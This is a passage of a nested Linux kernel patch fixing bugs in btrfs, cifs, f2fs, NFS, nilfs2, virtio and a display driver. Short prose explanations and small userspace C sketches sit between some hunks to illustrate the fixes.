+ 	PIS(ERRSYNCESC1);
+@@ -1618,6 +1624,8 @@ static void dsi_dump_dsidev_irqs(struct platform_device *dsidev,
+ 	PIS(ULPSACTIVENOT_ALL0);
+ 	PIS(ULPSACTIVENOT_ALL1);
+ #undef PIS
++
++	kfree(stats);
+ }
+ 
+ static void dsi1_dump_irqs(struct seq_file *s)
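
The dsi.c fix replaces an on-stack copy of struct dsi_irq_stats (large
enough to strain a kernel stack frame) with a heap allocation, while
keeping the copy-under-lock pattern so the seq_printf() calls run
outside the spinlock. A userspace analogue using a pthread mutex; the
struct size and field are illustrative:

    #include <pthread.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    /* Large enough that an on-stack copy would be a problem in the kernel. */
    struct stats { unsigned long counters[256]; };

    static struct stats live;
    static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;

    /* Snapshot-and-reset under the lock; format from the heap copy after. */
    static int dump_stats(void)
    {
            struct stats *snap = calloc(1, sizeof(*snap));

            if (!snap)
                    return -1;

            pthread_mutex_lock(&lock);
            *snap = live;
            memset(&live, 0, sizeof(live));
            pthread_mutex_unlock(&lock);

            printf("counter[0] = %lu\n", snap->counters[0]);
            free(snap);
            return 0;
    }

    int main(void)
    {
            live.counters[0] = 42;
            return dump_stats();    /* prints "counter[0] = 42" */
    }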
+diff --git a/drivers/virtio/virtio_pci_modern.c b/drivers/virtio/virtio_pci_modern.c
+index c3b9f27618497..edf2e18014cdf 100644
+--- a/drivers/virtio/virtio_pci_modern.c
++++ b/drivers/virtio/virtio_pci_modern.c
+@@ -303,7 +303,7 @@ static struct virtqueue *setup_vq(struct virtio_pci_device *vp_dev,
+ 	int err;
+ 
+ 	if (index >= vp_modern_get_num_queues(mdev))
+-		return ERR_PTR(-ENOENT);
++		return ERR_PTR(-EINVAL);
+ 
+ 	/* Check if queue is either not available or already active. */
+ 	num = vp_modern_get_queue_size(mdev, index);
+diff --git a/fs/btrfs/disk-io.c b/fs/btrfs/disk-io.c
+index 6538f52262ca4..883a3671a9774 100644
+--- a/fs/btrfs/disk-io.c
++++ b/fs/btrfs/disk-io.c
+@@ -344,7 +344,14 @@ error:
+ 	btrfs_print_tree(eb, 0);
+ 	btrfs_err(fs_info, "block=%llu write time tree block corruption detected",
+ 		  eb->start);
+-	WARN_ON(IS_ENABLED(CONFIG_BTRFS_DEBUG));
++	/*
++	 * Be noisy if this is an extent buffer from a log tree. We don't abort
++	 * the transaction when there's a bad log tree extent buffer; we just
++	 * fall back to a transaction commit. Still, we want to know when there is
++	 * a bad log tree extent buffer, as that may signal a bug somewhere.
++	 */
++	WARN_ON(IS_ENABLED(CONFIG_BTRFS_DEBUG) ||
++		btrfs_header_owner(eb) == BTRFS_TREE_LOG_OBJECTID);
+ 	return ret;
+ }
+ 
+diff --git a/fs/btrfs/extent-tree.c b/fs/btrfs/extent-tree.c
+index 2801c991814f5..571fcc5ae4dcf 100644
+--- a/fs/btrfs/extent-tree.c
++++ b/fs/btrfs/extent-tree.c
+@@ -1706,6 +1706,11 @@ static int run_one_delayed_ref(struct btrfs_trans_handle *trans,
+ 		BUG();
+ 	if (ret && insert_reserved)
+ 		btrfs_pin_extent(trans, node->bytenr, node->num_bytes, 1);
++	if (ret < 0)
++		btrfs_err(trans->fs_info,
++"failed to run delayed ref for logical %llu num_bytes %llu type %u action %u ref_mod %d: %d",
++			  node->bytenr, node->num_bytes, node->type,
++			  node->action, node->ref_mod, ret);
+ 	return ret;
+ }
+ 
+@@ -1947,8 +1952,6 @@ static int btrfs_run_delayed_refs_for_head(struct btrfs_trans_handle *trans,
+ 		if (ret) {
+ 			unselect_delayed_ref_head(delayed_refs, locked_ref);
+ 			btrfs_put_delayed_ref(ref);
+-			btrfs_debug(fs_info, "run_one_delayed_ref returned %d",
+-				    ret);
+ 			return ret;
+ 		}
+ 
+diff --git a/fs/btrfs/file.c b/fs/btrfs/file.c
+index 9bef8eaa074a0..23056d9914d84 100644
+--- a/fs/btrfs/file.c
++++ b/fs/btrfs/file.c
+@@ -3838,6 +3838,7 @@ static loff_t find_desired_extent(struct btrfs_inode *inode, loff_t offset,
+ 		struct extent_buffer *leaf = path->nodes[0];
+ 		struct btrfs_file_extent_item *extent;
+ 		u64 extent_end;
++		u8 type;
+ 
+ 		if (path->slots[0] >= btrfs_header_nritems(leaf)) {
+ 			ret = btrfs_next_leaf(root, path);
+@@ -3892,10 +3893,16 @@ static loff_t find_desired_extent(struct btrfs_inode *inode, loff_t offset,
+ 
+ 		extent = btrfs_item_ptr(leaf, path->slots[0],
+ 					struct btrfs_file_extent_item);
++		type = btrfs_file_extent_type(leaf, extent);
+ 
+-		if (btrfs_file_extent_disk_bytenr(leaf, extent) == 0 ||
+-		    btrfs_file_extent_type(leaf, extent) ==
+-		    BTRFS_FILE_EXTENT_PREALLOC) {
++		/*
++		 * Can't access the extent's disk_bytenr field if this is an
++		 * inline extent, since at that offset, it's where the extent
++		 * data starts.
++		 */
++		if (type == BTRFS_FILE_EXTENT_PREALLOC ||
++		    (type == BTRFS_FILE_EXTENT_REG &&
++		     btrfs_file_extent_disk_bytenr(leaf, extent) == 0)) {
+ 			/*
+ 			 * Explicit hole or prealloc extent, search for delalloc.
+ 			 * A prealloc extent is treated like a hole.
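
The file.c hunk reorders the checks so the extent's type is inspected
before any type-dependent field: for an inline extent, the disk_bytenr
offset overlaps the inline data itself. The same tag-before-field
discipline in a self-contained sketch; the struct is an illustrative
stand-in (in the kernel the read is an offset into the leaf, not a
struct field):

    #include <stdbool.h>
    #include <stdint.h>
    #include <stdio.h>

    enum extent_type { EXTENT_INLINE, EXTENT_REG, EXTENT_PREALLOC };

    struct file_extent {
            enum extent_type type;
            uint64_t disk_bytenr;   /* only meaningful for REG and PREALLOC */
    };

    /*
     * Hole-or-prealloc test that never consults disk_bytenr for inline
     * extents: check the type tag first, type-dependent fields second.
     */
    static bool is_hole_like(const struct file_extent *e)
    {
            if (e->type == EXTENT_PREALLOC)
                    return true;
            return e->type == EXTENT_REG && e->disk_bytenr == 0;
    }

    int main(void)
    {
            struct file_extent inline_e = { EXTENT_INLINE, 0 };

            printf("%d\n", is_hole_like(&inline_e));    /* prints 0 */
            return 0;
    }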
+diff --git a/fs/btrfs/qgroup.c b/fs/btrfs/qgroup.c
+index b74105a10f16c..5ac65384c9471 100644
+--- a/fs/btrfs/qgroup.c
++++ b/fs/btrfs/qgroup.c
+@@ -2751,9 +2751,19 @@ int btrfs_qgroup_account_extents(struct btrfs_trans_handle *trans)
+ 			      BTRFS_QGROUP_RUNTIME_FLAG_NO_ACCOUNTING)) {
+ 			/*
+ 			 * Old roots should be searched when inserting qgroup
+-			 * extent record
++			 * extent record.
++			 *
++			 * But for the INCONSISTENT (NO_ACCOUNTING) -> rescan case,
++			 * we may have some records inserted during
++			 * NO_ACCOUNTING (thus no old_roots populated), and
++			 * later start a rescan, which clears NO_ACCOUNTING,
++			 * leaving some inserted records without old_roots
++			 * populated.
++			 *
++			 * Those cases are rare and should not cause too much
++			 * time spent during commit_transaction().
+ 			 */
+-			if (WARN_ON(!record->old_roots)) {
++			if (!record->old_roots) {
+ 				/* Search commit root to find old_roots */
+ 				ret = btrfs_find_all_roots(NULL, fs_info,
+ 						record->bytenr, 0,
+@@ -3338,6 +3348,7 @@ static void btrfs_qgroup_rescan_worker(struct btrfs_work *work)
+ 	int err = -ENOMEM;
+ 	int ret = 0;
+ 	bool stopped = false;
++	bool did_leaf_rescans = false;
+ 
+ 	path = btrfs_alloc_path();
+ 	if (!path)
+@@ -3358,6 +3369,7 @@ static void btrfs_qgroup_rescan_worker(struct btrfs_work *work)
+ 		}
+ 
+ 		err = qgroup_rescan_leaf(trans, path);
++		did_leaf_rescans = true;
+ 
+ 		if (err > 0)
+ 			btrfs_commit_transaction(trans);
+@@ -3378,16 +3390,23 @@ out:
+ 	mutex_unlock(&fs_info->qgroup_rescan_lock);
+ 
+ 	/*
+-	 * only update status, since the previous part has already updated the
+-	 * qgroup info.
++	 * Only update status, since the previous part has already updated the
++	 * qgroup info, and only if we did any actual work. This also prevents
++	 * race with a concurrent quota disable, which has already set
++	 * fs_info->quota_root to NULL and cleared BTRFS_FS_QUOTA_ENABLED at
++	 * btrfs_quota_disable().
+ 	 */
+-	trans = btrfs_start_transaction(fs_info->quota_root, 1);
+-	if (IS_ERR(trans)) {
+-		err = PTR_ERR(trans);
++	if (did_leaf_rescans) {
++		trans = btrfs_start_transaction(fs_info->quota_root, 1);
++		if (IS_ERR(trans)) {
++			err = PTR_ERR(trans);
++			trans = NULL;
++			btrfs_err(fs_info,
++				  "fail to start transaction for status update: %d",
++				  err);
++		}
++	} else {
+ 		trans = NULL;
+-		btrfs_err(fs_info,
+-			  "fail to start transaction for status update: %d",
+-			  err);
+ 	}
+ 
+ 	mutex_lock(&fs_info->qgroup_rescan_lock);
+diff --git a/fs/btrfs/tree-log.c b/fs/btrfs/tree-log.c
+index c3cf3dabe0b1b..7535857f4c8fb 100644
+--- a/fs/btrfs/tree-log.c
++++ b/fs/btrfs/tree-log.c
+@@ -3011,7 +3011,6 @@ int btrfs_sync_log(struct btrfs_trans_handle *trans,
+ 		ret = 0;
+ 	if (ret) {
+ 		blk_finish_plug(&plug);
+-		btrfs_abort_transaction(trans, ret);
+ 		btrfs_set_log_full_commit(trans);
+ 		mutex_unlock(&root->log_mutex);
+ 		goto out;
+@@ -3076,15 +3075,12 @@ int btrfs_sync_log(struct btrfs_trans_handle *trans,
+ 
+ 		blk_finish_plug(&plug);
+ 		btrfs_set_log_full_commit(trans);
+-
+-		if (ret != -ENOSPC) {
+-			btrfs_abort_transaction(trans, ret);
+-			mutex_unlock(&log_root_tree->log_mutex);
+-			goto out;
+-		}
++		if (ret != -ENOSPC)
++			btrfs_err(fs_info,
++				  "failed to update log for root %llu ret %d",
++				  root->root_key.objectid, ret);
+ 		btrfs_wait_tree_log_extents(log, mark);
+ 		mutex_unlock(&log_root_tree->log_mutex);
+-		ret = BTRFS_LOG_FORCE_COMMIT;
+ 		goto out;
+ 	}
+ 
+@@ -3143,7 +3139,6 @@ int btrfs_sync_log(struct btrfs_trans_handle *trans,
+ 		goto out_wake_log_root;
+ 	} else if (ret) {
+ 		btrfs_set_log_full_commit(trans);
+-		btrfs_abort_transaction(trans, ret);
+ 		mutex_unlock(&log_root_tree->log_mutex);
+ 		goto out_wake_log_root;
+ 	}
+@@ -3857,7 +3852,10 @@ static noinline int log_dir_items(struct btrfs_trans_handle *trans,
+ 					      path->slots[0]);
+ 			if (tmp.type == BTRFS_DIR_INDEX_KEY)
+ 				last_old_dentry_offset = tmp.offset;
++		} else if (ret < 0) {
++			err = ret;
+ 		}
++
+ 		goto done;
+ 	}
+ 
+@@ -3877,19 +3875,34 @@ static noinline int log_dir_items(struct btrfs_trans_handle *trans,
+ 		 */
+ 		if (tmp.type == BTRFS_DIR_INDEX_KEY)
+ 			last_old_dentry_offset = tmp.offset;
++	} else if (ret < 0) {
++		err = ret;
++		goto done;
+ 	}
++
+ 	btrfs_release_path(path);
+ 
+ 	/*
+-	 * Find the first key from this transaction again.  See the note for
+-	 * log_new_dir_dentries, if we're logging a directory recursively we
+-	 * won't be holding its i_mutex, which means we can modify the directory
+-	 * while we're logging it.  If we remove an entry between our first
+-	 * search and this search we'll not find the key again and can just
+-	 * bail.
++	 * Find the first key from this transaction again or the one we were at
++	 * in the loop below in case we had to reschedule. We may be logging the
++	 * directory without holding its VFS lock, which happens when logging new
++	 * dentries (through log_new_dir_dentries()) or in some cases when we
++	 * need to log the parent directory of an inode. This means a dir index
++	 * key might be deleted from the inode's root, and therefore we may not
++	 * find it anymore. If we can't find it, just move to the next key. We
++	 * cannot bail out and ignore it, because if we do that we will simply
++	 * not log dir index keys that come after the one that was just deleted
++	 * and we can end up logging a dir index range that ends at (u64)-1
++	 * (@last_offset is initialized to that), resulting in removing dir
++	 * entries we should not remove at log replay time.
+ 	 */
+ search:
+ 	ret = btrfs_search_slot(NULL, root, &min_key, path, 0, 0);
++	if (ret > 0)
++		ret = btrfs_next_item(root, path);
++	if (ret < 0)
++		err = ret;
++	/* If ret is 1, there are no more keys in the inode's root. */
+ 	if (ret != 0)
+ 		goto done;
+ 
+@@ -5608,8 +5621,10 @@ static int add_conflicting_inode(struct btrfs_trans_handle *trans,
+ 	 * LOG_INODE_EXISTS mode) and slow down other fsyncs or transaction
+ 	 * commits.
+ 	 */
+-	if (ctx->num_conflict_inodes >= MAX_CONFLICT_INODES)
++	if (ctx->num_conflict_inodes >= MAX_CONFLICT_INODES) {
++		btrfs_set_log_full_commit(trans);
+ 		return BTRFS_LOG_FORCE_COMMIT;
++	}
+ 
+ 	inode = btrfs_iget(root->fs_info->sb, ino, root);
+ 	/*
+diff --git a/fs/btrfs/volumes.c b/fs/btrfs/volumes.c
+index dba087ad40ea2..65e4e887605f9 100644
+--- a/fs/btrfs/volumes.c
++++ b/fs/btrfs/volumes.c
+@@ -770,8 +770,11 @@ static noinline struct btrfs_device *device_list_add(const char *path,
+ 					BTRFS_SUPER_FLAG_CHANGING_FSID_V2);
+ 
+ 	error = lookup_bdev(path, &path_devt);
+-	if (error)
++	if (error) {
++		btrfs_err(NULL, "failed to lookup block device for path %s: %d",
++			  path, error);
+ 		return ERR_PTR(error);
++	}
+ 
+ 	if (fsid_change_in_progress) {
+ 		if (!has_metadata_uuid)
+@@ -836,6 +839,9 @@ static noinline struct btrfs_device *device_list_add(const char *path,
+ 
+ 	if (!device) {
+ 		if (fs_devices->opened) {
++			btrfs_err(NULL,
++		"device %s belongs to fsid %pU, and the fs is already mounted",
++				  path, fs_devices->fsid);
+ 			mutex_unlock(&fs_devices->device_list_mutex);
+ 			return ERR_PTR(-EBUSY);
+ 		}
+@@ -910,6 +916,9 @@ static noinline struct btrfs_device *device_list_add(const char *path,
+ 			 * generation are equal.
+ 			 */
+ 			mutex_unlock(&fs_devices->device_list_mutex);
++			btrfs_err(NULL,
++"device %s already registered with a higher generation, found %llu expect %llu",
++				  path, found_transid, device->generation);
+ 			return ERR_PTR(-EEXIST);
+ 		}
+ 
+diff --git a/fs/cifs/connect.c b/fs/cifs/connect.c
+index fde1c371605a1..eab36e4ea1300 100644
+--- a/fs/cifs/connect.c
++++ b/fs/cifs/connect.c
+@@ -3554,9 +3554,6 @@ static int is_path_remote(struct mount_ctx *mnt_ctx)
+ 	struct cifs_tcon *tcon = mnt_ctx->tcon;
+ 	struct smb3_fs_context *ctx = mnt_ctx->fs_ctx;
+ 	char *full_path;
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-	bool nodfs = cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS;
+-#endif
+ 
+ 	if (!server->ops->is_path_accessible)
+ 		return -EOPNOTSUPP;
+@@ -3573,19 +3570,6 @@ static int is_path_remote(struct mount_ctx *mnt_ctx)
+ 
+ 	rc = server->ops->is_path_accessible(xid, tcon, cifs_sb,
+ 					     full_path);
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-	if (nodfs) {
+-		if (rc == -EREMOTE)
+-			rc = -EOPNOTSUPP;
+-		goto out;
+-	}
+-
+-	/* path *might* exist with non-ASCII characters in DFS root
+-	 * try again with full path (only if nodfs is not set) */
+-	if (rc == -ENOENT && is_tcon_dfs(tcon))
+-		rc = cifs_dfs_query_info_nonascii_quirk(xid, tcon, cifs_sb,
+-							full_path);
+-#endif
+ 	if (rc != 0 && rc != -EREMOTE)
+ 		goto out;
+ 
+diff --git a/fs/cifs/inode.c b/fs/cifs/inode.c
+index 4e2ca3c6e5c00..0c9b619e4386b 100644
+--- a/fs/cifs/inode.c
++++ b/fs/cifs/inode.c
+@@ -991,12 +991,6 @@ int cifs_get_inode_info(struct inode **inode, const char *full_path,
+ 		}
+ 		rc = server->ops->query_path_info(xid, tcon, cifs_sb, full_path, &tmp_data,
+ 						  &adjust_tz, &is_reparse_point);
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-		if (rc == -ENOENT && is_tcon_dfs(tcon))
+-			rc = cifs_dfs_query_info_nonascii_quirk(xid, tcon,
+-								cifs_sb,
+-								full_path);
+-#endif
+ 		data = &tmp_data;
+ 	}
+ 
+diff --git a/fs/cifs/misc.c b/fs/cifs/misc.c
+index 1cbecd64d697f..062175994e879 100644
+--- a/fs/cifs/misc.c
++++ b/fs/cifs/misc.c
+@@ -1314,49 +1314,4 @@ int cifs_update_super_prepath(struct cifs_sb_info *cifs_sb, char *prefix)
+ 	cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_USE_PREFIX_PATH;
+ 	return 0;
+ }
+-
+-/** cifs_dfs_query_info_nonascii_quirk
+- * Handle weird Windows SMB server behaviour. It responds with
+- * STATUS_OBJECT_NAME_INVALID code to SMB2 QUERY_INFO request
+- * for "\<server>\<dfsname>\<linkpath>" DFS reference,
+- * where <dfsname> contains non-ASCII unicode symbols.
+- *
+- * Check such DFS reference.
+- */
+-int cifs_dfs_query_info_nonascii_quirk(const unsigned int xid,
+-				       struct cifs_tcon *tcon,
+-				       struct cifs_sb_info *cifs_sb,
+-				       const char *linkpath)
+-{
+-	char *treename, *dfspath, sep;
+-	int treenamelen, linkpathlen, rc;
+-
+-	treename = tcon->tree_name;
+-	/* MS-DFSC: All paths in REQ_GET_DFS_REFERRAL and RESP_GET_DFS_REFERRAL
+-	 * messages MUST be encoded with exactly one leading backslash, not two
+-	 * leading backslashes.
+-	 */
+-	sep = CIFS_DIR_SEP(cifs_sb);
+-	if (treename[0] == sep && treename[1] == sep)
+-		treename++;
+-	linkpathlen = strlen(linkpath);
+-	treenamelen = strnlen(treename, MAX_TREE_SIZE + 1);
+-	dfspath = kzalloc(treenamelen + linkpathlen + 1, GFP_KERNEL);
+-	if (!dfspath)
+-		return -ENOMEM;
+-	if (treenamelen)
+-		memcpy(dfspath, treename, treenamelen);
+-	memcpy(dfspath + treenamelen, linkpath, linkpathlen);
+-	rc = dfs_cache_find(xid, tcon->ses, cifs_sb->local_nls,
+-			    cifs_remap(cifs_sb), dfspath, NULL, NULL);
+-	if (rc == 0) {
+-		cifs_dbg(FYI, "DFS ref '%s' is found, emulate -EREMOTE\n",
+-			 dfspath);
+-		rc = -EREMOTE;
+-	} else {
+-		cifs_dbg(FYI, "%s: dfs_cache_find returned %d\n", __func__, rc);
+-	}
+-	kfree(dfspath);
+-	return rc;
+-}
+ #endif
+diff --git a/fs/cifs/smb2inode.c b/fs/cifs/smb2inode.c
+index 68e08c85fbb87..6c84d2983166a 100644
+--- a/fs/cifs/smb2inode.c
++++ b/fs/cifs/smb2inode.c
+@@ -540,22 +540,41 @@ int smb2_query_path_info(const unsigned int xid, struct cifs_tcon *tcon,
+ 	rc = smb2_compound_op(xid, tcon, cifs_sb, full_path, FILE_READ_ATTRIBUTES, FILE_OPEN,
+ 			      create_options, ACL_NO_MODE, data, SMB2_OP_QUERY_INFO, cfile,
+ 			      err_iov, err_buftype);
+-	if (rc == -EOPNOTSUPP) {
+-		if (err_iov[0].iov_base && err_buftype[0] != CIFS_NO_BUFFER &&
+-		    ((struct smb2_hdr *)err_iov[0].iov_base)->Command == SMB2_CREATE &&
+-		    ((struct smb2_hdr *)err_iov[0].iov_base)->Status == STATUS_STOPPED_ON_SYMLINK) {
+-			rc = smb2_parse_symlink_response(cifs_sb, err_iov, &data->symlink_target);
++	if (rc) {
++		struct smb2_hdr *hdr = err_iov[0].iov_base;
++
++		if (unlikely(!hdr || err_buftype[0] == CIFS_NO_BUFFER))
++			goto out;
++		if (rc == -EOPNOTSUPP && hdr->Command == SMB2_CREATE &&
++		    hdr->Status == STATUS_STOPPED_ON_SYMLINK) {
++			rc = smb2_parse_symlink_response(cifs_sb, err_iov,
++							 &data->symlink_target);
+ 			if (rc)
+ 				goto out;
+-		}
+-		*reparse = true;
+-		create_options |= OPEN_REPARSE_POINT;
+ 
+-		/* Failed on a symbolic link - query a reparse point info */
+-		cifs_get_readable_path(tcon, full_path, &cfile);
+-		rc = smb2_compound_op(xid, tcon, cifs_sb, full_path, FILE_READ_ATTRIBUTES,
+-				      FILE_OPEN, create_options, ACL_NO_MODE, data,
+-				      SMB2_OP_QUERY_INFO, cfile, NULL, NULL);
++			*reparse = true;
++			create_options |= OPEN_REPARSE_POINT;
++
++			/* Failed on a symbolic link - query a reparse point info */
++			cifs_get_readable_path(tcon, full_path, &cfile);
++			rc = smb2_compound_op(xid, tcon, cifs_sb, full_path,
++					      FILE_READ_ATTRIBUTES, FILE_OPEN,
++					      create_options, ACL_NO_MODE, data,
++					      SMB2_OP_QUERY_INFO, cfile, NULL, NULL);
++			goto out;
++		} else if (rc != -EREMOTE && IS_ENABLED(CONFIG_CIFS_DFS_UPCALL) &&
++			   hdr->Status == STATUS_OBJECT_NAME_INVALID) {
++			/*
++			 * Handle weird Windows SMB server behaviour. It responds with
++			 * a STATUS_OBJECT_NAME_INVALID code to an SMB2 QUERY_INFO
++			 * request for a "\<server>\<dfsname>\<linkpath>" DFS reference,
++			 * where <dfsname> contains non-ASCII Unicode symbols.
++			 */
++			rc = -EREMOTE;
++		}
++		if (rc == -EREMOTE && IS_ENABLED(CONFIG_CIFS_DFS_UPCALL) && cifs_sb &&
++		    (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS))
++			rc = -EOPNOTSUPP;
+ 	}
+ 
+ out:
+diff --git a/fs/cifs/smb2ops.c b/fs/cifs/smb2ops.c
+index 8da98918cf86b..1ff5b6b0e07a1 100644
+--- a/fs/cifs/smb2ops.c
++++ b/fs/cifs/smb2ops.c
+@@ -797,7 +797,9 @@ smb2_is_path_accessible(const unsigned int xid, struct cifs_tcon *tcon,
+ 	int rc;
+ 	__le16 *utf16_path;
+ 	__u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
++	int err_buftype = CIFS_NO_BUFFER;
+ 	struct cifs_open_parms oparms;
++	struct kvec err_iov = {};
+ 	struct cifs_fid fid;
+ 	struct cached_fid *cfid;
+ 
+@@ -821,14 +823,32 @@ smb2_is_path_accessible(const unsigned int xid, struct cifs_tcon *tcon,
+ 	oparms.fid = &fid;
+ 	oparms.reconnect = false;
+ 
+-	rc = SMB2_open(xid, &oparms, utf16_path, &oplock, NULL, NULL, NULL,
+-		       NULL);
++	rc = SMB2_open(xid, &oparms, utf16_path, &oplock, NULL, NULL,
++		       &err_iov, &err_buftype);
+ 	if (rc) {
+-		kfree(utf16_path);
+-		return rc;
++		struct smb2_hdr *hdr = err_iov.iov_base;
++
++		if (unlikely(!hdr || err_buftype == CIFS_NO_BUFFER))
++			goto out;
++		/*
++		 * Handle weird Windows SMB server behaviour. It responds with
++		 * a STATUS_OBJECT_NAME_INVALID code to an SMB2 QUERY_INFO
++		 * request for a "\<server>\<dfsname>\<linkpath>" DFS reference,
++		 * where <dfsname> contains non-ASCII Unicode symbols.
++		 */
++		if (rc != -EREMOTE && IS_ENABLED(CONFIG_CIFS_DFS_UPCALL) &&
++		    hdr->Status == STATUS_OBJECT_NAME_INVALID)
++			rc = -EREMOTE;
++		if (rc == -EREMOTE && IS_ENABLED(CONFIG_CIFS_DFS_UPCALL) && cifs_sb &&
++		    (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS))
++			rc = -EOPNOTSUPP;
++		goto out;
+ 	}
+ 
+ 	rc = SMB2_close(xid, tcon, fid.persistent_fid, fid.volatile_fid);
++
++out:
++	free_rsp_buf(err_buftype, err_iov.iov_base);
+ 	kfree(utf16_path);
+ 	return rc;
+ }
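
Both cifs hunks above translate the server's STATUS_OBJECT_NAME_INVALID
reply into -EREMOTE so the DFS code chases a referral, then downgrade it
to -EOPNOTSUPP when the mount disabled DFS. The errno fixup, isolated
into a small testable function; fixup_dfs_rc() and its flag parameters
are illustrative, not cifs API:

    #include <errno.h>
    #include <stdbool.h>
    #include <stdio.h>

    /*
     * STATUS_OBJECT_NAME_INVALID on a DFS link really means "this path
     * lives elsewhere" (-EREMOTE), unless DFS is disabled for the
     * mount, in which case -EOPNOTSUPP is reported instead.
     */
    static int fixup_dfs_rc(int rc, bool name_invalid, bool dfs_built_in,
                            bool mount_no_dfs)
    {
            if (rc != -EREMOTE && dfs_built_in && name_invalid)
                    rc = -EREMOTE;
            if (rc == -EREMOTE && dfs_built_in && mount_no_dfs)
                    rc = -EOPNOTSUPP;
            return rc;
    }

    int main(void)
    {
            /* quirky reply on a DFS-enabled build -> -EREMOTE; prints 1 */
            printf("%d\n",
                   fixup_dfs_rc(-EOPNOTSUPP, true, true, false) == -EREMOTE);
            return 0;
    }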
+diff --git a/fs/cifs/smb2pdu.c b/fs/cifs/smb2pdu.c
+index 4ac5b1bfaf781..92f39052d3117 100644
+--- a/fs/cifs/smb2pdu.c
++++ b/fs/cifs/smb2pdu.c
+@@ -541,9 +541,10 @@ static void
+ assemble_neg_contexts(struct smb2_negotiate_req *req,
+ 		      struct TCP_Server_Info *server, unsigned int *total_len)
+ {
+-	char *pneg_ctxt;
+-	char *hostname = NULL;
+ 	unsigned int ctxt_len, neg_context_count;
++	struct TCP_Server_Info *pserver;
++	char *pneg_ctxt;
++	char *hostname;
+ 
+ 	if (*total_len > 200) {
+ 		/* In case length corrupted don't want to overrun smb buffer */
+@@ -574,8 +575,9 @@ assemble_neg_contexts(struct smb2_negotiate_req *req,
+ 	 * secondary channels don't have the hostname field populated
+ 	 * use the hostname field in the primary channel instead
+ 	 */
+-	hostname = CIFS_SERVER_IS_CHAN(server) ?
+-		server->primary_server->hostname : server->hostname;
++	pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
++	cifs_server_lock(pserver);
++	hostname = pserver->hostname;
+ 	if (hostname && (hostname[0] != 0)) {
+ 		ctxt_len = build_netname_ctxt((struct smb2_netname_neg_context *)pneg_ctxt,
+ 					      hostname);
+@@ -584,6 +586,7 @@ assemble_neg_contexts(struct smb2_negotiate_req *req,
+ 		neg_context_count = 3;
+ 	} else
+ 		neg_context_count = 2;
++	cifs_server_unlock(pserver);
+ 
+ 	build_posix_ctxt((struct smb2_posix_neg_context *)pneg_ctxt);
+ 	*total_len += sizeof(struct smb2_posix_neg_context);
+@@ -4159,12 +4162,15 @@ smb2_readv_callback(struct mid_q_entry *mid)
+ 				(struct smb2_hdr *)rdata->iov[0].iov_base;
+ 	struct cifs_credits credits = { .value = 0, .instance = 0 };
+ 	struct smb_rqst rqst = { .rq_iov = &rdata->iov[1],
+-				 .rq_nvec = 1,
+-				 .rq_pages = rdata->pages,
+-				 .rq_offset = rdata->page_offset,
+-				 .rq_npages = rdata->nr_pages,
+-				 .rq_pagesz = rdata->pagesz,
+-				 .rq_tailsz = rdata->tailsz };
++				 .rq_nvec = 1, };
++
++	if (rdata->got_bytes) {
++		rqst.rq_pages = rdata->pages;
++		rqst.rq_offset = rdata->page_offset;
++		rqst.rq_npages = rdata->nr_pages;
++		rqst.rq_pagesz = rdata->pagesz;
++		rqst.rq_tailsz = rdata->tailsz;
++	}
+ 
+ 	WARN_ONCE(rdata->server != mid->server,
+ 		  "rdata server %p != mid server %p",
+diff --git a/fs/f2fs/extent_cache.c b/fs/f2fs/extent_cache.c
+index 932c070173b97..6c9e6f78a3e37 100644
+--- a/fs/f2fs/extent_cache.c
++++ b/fs/f2fs/extent_cache.c
+@@ -415,7 +415,8 @@ static bool f2fs_lookup_extent_tree(struct inode *inode, pgoff_t pgofs,
+ 	struct extent_node *en;
+ 	bool ret = false;
+ 
+-	f2fs_bug_on(sbi, !et);
++	if (!et)
++		return false;
+ 
+ 	trace_f2fs_lookup_extent_tree_start(inode, pgofs);
+ 
+diff --git a/fs/nfs/filelayout/filelayout.c b/fs/nfs/filelayout/filelayout.c
+index ad34a33b0737c..4974cd18ca468 100644
+--- a/fs/nfs/filelayout/filelayout.c
++++ b/fs/nfs/filelayout/filelayout.c
+@@ -783,6 +783,12 @@ filelayout_alloc_lseg(struct pnfs_layout_hdr *layoutid,
+ 	return &fl->generic_hdr;
+ }
+ 
++static bool
++filelayout_lseg_is_striped(const struct nfs4_filelayout_segment *flseg)
++{
++	return flseg->num_fh > 1;
++}
++
+ /*
+  * filelayout_pg_test(). Called by nfs_can_coalesce_requests()
+  *
+@@ -803,6 +809,8 @@ filelayout_pg_test(struct nfs_pageio_descriptor *pgio, struct nfs_page *prev,
+ 	size = pnfs_generic_pg_test(pgio, prev, req);
+ 	if (!size)
+ 		return 0;
++	else if (!filelayout_lseg_is_striped(FILELAYOUT_LSEG(pgio->pg_lseg)))
++		return size;
+ 
+ 	/* see if req and prev are in the same stripe */
+ 	if (prev) {
+diff --git a/fs/nilfs2/btree.c b/fs/nilfs2/btree.c
+index b9d15c3df3cc1..40ce92a332fe7 100644
+--- a/fs/nilfs2/btree.c
++++ b/fs/nilfs2/btree.c
+@@ -480,9 +480,18 @@ static int __nilfs_btree_get_block(const struct nilfs_bmap *btree, __u64 ptr,
+ 	ret = nilfs_btnode_submit_block(btnc, ptr, 0, REQ_OP_READ, &bh,
+ 					&submit_ptr);
+ 	if (ret) {
+-		if (ret != -EEXIST)
+-			return ret;
+-		goto out_check;
++		if (likely(ret == -EEXIST))
++			goto out_check;
++		if (ret == -ENOENT) {
++			/*
++			 * Block address translation failed due to invalid
++			 * value of 'ptr'.  In this case, return internal code
++			 * -EINVAL (broken bmap) to notify the bmap layer of fatal
++			 * metadata corruption.
++			 */
++			ret = -EINVAL;
++		}
++		return ret;
+ 	}
+ 
+ 	if (ra) {
+diff --git a/fs/ntfs3/attrib.c b/fs/ntfs3/attrib.c
+index 578c2bcfb1d93..63169529b52c4 100644
+--- a/fs/ntfs3/attrib.c
++++ b/fs/ntfs3/attrib.c
